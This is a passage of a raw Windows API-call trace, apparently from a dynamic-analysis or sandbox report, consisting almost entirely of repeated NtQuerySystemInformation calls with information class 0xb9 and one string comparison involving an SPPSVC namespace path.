Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0272.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0272.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0272.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0272.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0272.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0272.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0272.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca58, Length=0x50, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0272.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0272.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0272.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x28, ResultLength=0x0) [0272.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x28, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x20, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x20, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x50, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0272.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0272.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x20, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x20, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e8, Length=0x50, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x28, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] 